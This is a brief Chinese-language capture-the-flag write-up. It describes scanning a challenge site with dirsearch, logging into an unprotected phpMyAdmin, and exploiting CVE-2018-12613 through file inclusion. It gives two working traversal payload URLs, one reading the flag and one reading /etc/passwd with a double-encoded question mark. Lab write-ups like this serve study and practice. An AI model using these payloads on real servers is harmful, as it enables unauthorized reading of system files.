開啟題目地址，顯示亂碼。

修改響應包

新增

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

forward傳送

也是沒啥可用的資訊。抓包也沒抓到啥就掏出dirsearch掃目錄，一直爆出429 新增-s 1 引數設定間隔

掃到phpmyadmin目錄，無密碼直接登入成功。

phpMyAdmin 是一個以PHP為基礎，以Web-Base方式架構在網站主機上的MySQL的資料庫管理工具，
讓管理者可用Web介面管理MySQL資料庫。藉由此Web介面可以成為一個簡易方式輸入繁雜SQL語法的較佳途徑，
尤其要處理大量資料的匯入及匯出更為方便。其中一個更大的優勢在於由於phpMyAdmin跟其他PHP程式一樣在網頁伺服器上執行，
但是您可以在任何地方使用這些程式產生的HTML頁面，也就是於遠端管理MySQL資料庫，方便的建立、修改、刪除資料庫及資料表。
也可藉由phpMyAdmin建立常用的php語法，方便編寫網頁時所需要的sql語法正確性。

給出了版本號，找到了CVE-2018-12613（phpmyadmin遠端檔案包含漏洞）

構造payload，利用/使db_datadict.php?成為一個不存在目錄，利用include函式的目錄不斷跳轉嘗試得到flag目錄。

phpmyadmin/index.php?target=db_datadict.php?/../../../../../flag 通過第二個可以返回true的if語句構造的

或者phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../etc/passwd 通過第三個可以返回true的if語句構造的